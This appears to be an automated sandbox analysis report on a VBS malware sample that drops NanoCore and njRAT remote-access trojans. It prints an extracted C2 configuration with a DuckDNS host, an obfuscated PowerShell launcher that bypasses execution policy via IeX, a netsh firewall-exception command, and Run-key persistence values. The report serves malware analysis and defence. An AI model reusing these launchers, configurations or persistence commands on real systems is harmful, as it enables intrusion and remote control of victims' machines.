Analysis
  max time kernel: 150s
  max time network: 151s
  platform: windows10_x64
  resource: win10-en-20211104
  submitted: 18-11-2021 19:18
  Static task: static1
  Behavioral task: behavioral1
    Sample: J3m1a_Payment_Copy.vbs
    Resource: win7-en-20211014

General
  Target: J3m1a_Payment_Copy.vbs
  Size: 2KB
  MD5: 69cb30fd3d94cfcc7c89a1f41a47d8dd
  SHA1: 5cc7c867d8b5238fa7ad4718c5ba5d105e72cd22
  SHA256: 6cb5a93eec2726f651d8a61a9e865d46a93324992d9a2467edb6b83b64789985
  SHA512: 02a96d4ecfda83233a557ac3cf94629ee251ed9ecef775bd697d371091c5c03fb48aacb4640770fdd9fd097f1cd118b62053c0f26183e08062ede68a6c4b8d5a
Malware Config

Extracted: nanocore
  version: 1.2.2.0
  host: jamcav.duckdns.org:6746
  mutex: 9bb8b571-1a08-4fb2-8447-a1da0968f2fa
  activate_away_mode: true
  backup_connection_host: jamcav.duckdns.org
  backup_dns_server: 8.8.4.4
  buffer_size: 65535
  build_time: 2021-08-20T15:54:30.577245636Z
  bypass_user_account_control: true
  bypass_user_account_control_data: (empty)
  clear_access_control: true
  clear_zone_identifier: false
  connect_delay: 4000
  connection_port: 6746
  default_group: jam
  enable_debug_mode: true
  gc_threshold: 1.048576e+07
  keep_alive_timeout: 30000
  keyboard_logging: false
  lan_timeout: 2500
  max_packet_size: 1.048576e+07
  mutex: 9bb8b571-1a08-4fb2-8447-a1da0968f2fa
  mutex_timeout: 5000
  prevent_system_sleep: false
  primary_connection_host: jamcav.duckdns.org
  primary_dns_server: 8.8.8.8
  request_elevation: true
  restart_delay: 5000
  run_delay: 0
  run_on_startup: true
  set_critical_process: true
  timeout_interval: 5000
  use_custom_dns_server: false
  version: 1.2.2.0
  wan_timeout: 8000

Extracted: njrat
  version: 1.9
  HacKed
  Microsoft.Exe
  reg_key: Microsoft.Exe
Signatures

Blocklisted process makes network request (1 IoC)
  flow 12: PID 2428 powershell.exe

Executes dropped EXE (1 IoC)
  PID 316 GoogleCrashHandler.exe

Modifies Windows Firewall (1 TTP)

Adds Run key to start application (2 TTPs, 2 IoCs)
  jsc.exe: Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe\" .."
  jsc.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe\" .."

Suspicious use of SetThreadContext (3 IoCs)
  PID 2428 powershell.exe set thread context of PID 1168 jsc.exe
  PID 2428 powershell.exe set thread context of PID 1752 jsc.exe
  PID 2428 powershell.exe set thread context of PID 3908 jsc.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (15 IoCs)
  PID 2624 powershell.exe (x3)
  PID 2428 powershell.exe (x3)
  PID 1168 jsc.exe (x9)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  PID 1168 jsc.exe

Suspicious use of AdjustPrivilegeToken (14 IoCs)
  Token: SeDebugPrivilege, PID 2624 powershell.exe
  Token: SeDebugPrivilege, PID 2428 powershell.exe
  Token: SeDebugPrivilege, PID 1168 jsc.exe
  Token: SeDebugPrivilege, PID 3908 jsc.exe
  Token: 33, PID 3908 jsc.exe (x5)
  Token: SeIncBasePriorityPrivilege, PID 3908 jsc.exe (x5)

Suspicious use of FindShellTrayWindow (1 IoC)
  PID 1752 jsc.exe

Suspicious use of WriteProcessMemory (34 IoCs)
  PID 2476 WScript.exe wrote to memory of PID 2624 powershell.exe (x2)
  PID 2624 powershell.exe wrote to memory of PID 2428 powershell.exe (x2)
  PID 2428 powershell.exe wrote to memory of PID 1168 jsc.exe (x8)
  PID 2428 powershell.exe wrote to memory of PID 1752 jsc.exe (x8)
  PID 2428 powershell.exe wrote to memory of PID 3908 jsc.exe (x8)
  PID 1752 jsc.exe wrote to memory of PID 316 GoogleCrashHandler.exe (x3)
  PID 3908 jsc.exe wrote to memory of PID 3984 netsh.exe (x3)
Processes

[depth 1] C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\J3m1a_Payment_Copy.vbs"
  - Suspicious use of WriteProcessMemory

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cc = 'by------------s'.Replace('------------','pas');$bb = '-ex++++++++++++++++icy'.Replace('++++++++++++++++','ecutionpol');$aa = '-no--------------le'.Replace('--------------','profi');$dd = 'C:\Us<<<<<<<<<>>>>>>>>>ar.ps1'.Replace('<<<<<<<<<>>>>>>>>>','ers\Public\Downloads\HB');$Run = 'Powers-----------------dd'.Replace('-----------------','hell $aa $bb $cc -file $');($Run -Join '')|&('I'+'eX')
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -file C:\Users\Public\Downloads\HBar.ps1
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      [depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: GetForegroundWindowSpam
        - Suspicious use of AdjustPrivilegeToken

      [depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory

        [depth 5] C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe
          "C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe"
          - Executes dropped EXE

      [depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        - Adds Run key to start application
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        [depth 5] C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" "jsc.exe" ENABLE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads